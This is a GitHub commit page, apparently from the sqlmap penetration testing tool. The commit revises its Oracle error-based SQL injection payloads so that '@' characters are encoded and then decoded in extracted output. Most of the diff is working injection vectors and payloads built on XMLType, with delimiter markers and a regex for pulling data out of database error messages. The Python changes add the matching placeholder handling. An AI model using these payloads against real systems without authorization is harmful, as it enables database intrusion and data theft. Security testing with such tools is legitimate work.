Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit a89140e

Browse files
stamparmstamparm
committed
revisit of Oracle error-based payloads (added replace for '@' as a problematic char for XMLType function)
1 parent 8a00ca8 commit a89140e

4 files changed

Lines changed: 10 additions & 8 deletions

File tree

lib/core/agent.py

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -213,6 +213,7 @@ def cleanupPayload(self, payload, origValue=None):
213213
payload = payload.replace("[RANDSTR1]", randStr1)
214214
payload = payload.replace("[DELIMITER_START]", kb.misc.start)
215215
payload = payload.replace("[DELIMITER_STOP]", kb.misc.stop)
216+
payload = payload.replace("[AT_REPLACE]", kb.misc.at)
216217
payload = payload.replace("[SPACE_REPLACE]", kb.misc.space)
217218
payload = payload.replace("[DOLLAR_REPLACE]", kb.misc.dollar)
218219
payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))

lib/core/option.py

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1463,6 +1463,7 @@ def __setKnowledgeBaseAttributes(flushAll=True):
14631463
kb.misc.delimiter = randomStr(length=6, lowercase=True)
14641464
kb.misc.start = ":%s:" % randomStr(length=3, lowercase=True)
14651465
kb.misc.stop = ":%s:" % randomStr(length=3, lowercase=True)
1466+
kb.misc.at = ":%s:" % randomStr(length=1, lowercase=True)
14661467
kb.misc.space = ":%s:" % randomStr(length=1, lowercase=True)
14671468
kb.misc.dollar = ":%s:" % randomStr(length=1, lowercase=True)
14681469
kb.misc.forcedDbms = None

lib/techniques/error/use.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -185,7 +185,7 @@ def __errorReplaceChars(value):
185185
retVal = value
186186

187187
if value:
188-
retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$")
188+
retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$").replace(kb.misc.at, "@")
189189

190190
return retVal
191191

xml/payloads.xml

Lines changed: 7 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -1117,7 +1117,7 @@ Formats:
11171117
<risk>0</risk>
11181118
<clause>1</clause>
11191119
<where>1</where>
1120-
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
1120+
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
11211121
<request>
11221122
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
11231123
</request>
@@ -1335,9 +1335,9 @@ Formats:
13351335
<risk>2</risk>
13361336
<clause>1</clause>
13371337
<where>2</where>
1338-
<vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
1338+
<vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
13391339
<request>
1340-
<payload>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
1340+
<payload>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
13411341
</request>
13421342
<response>
13431343
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1499,9 +1499,9 @@ Formats:
14991499
<risk>0</risk>
15001500
<clause>1,3</clause>
15011501
<where>3</where>
1502-
<vector>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
1502+
<vector>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
15031503
<request>
1504-
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
1504+
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
15051505
</request>
15061506
<response>
15071507
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1620,9 +1620,9 @@ Formats:
16201620
<risk>0</risk>
16211621
<clause>2,3</clause>
16221622
<where>1</where>
1623-
<vector>,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
1623+
<vector>,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
16241624
<request>
1625-
<payload>,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
1625+
<payload>,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
16261626
</request>
16271627
<response>
16281628
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>

0 commit comments

Comments
 (0)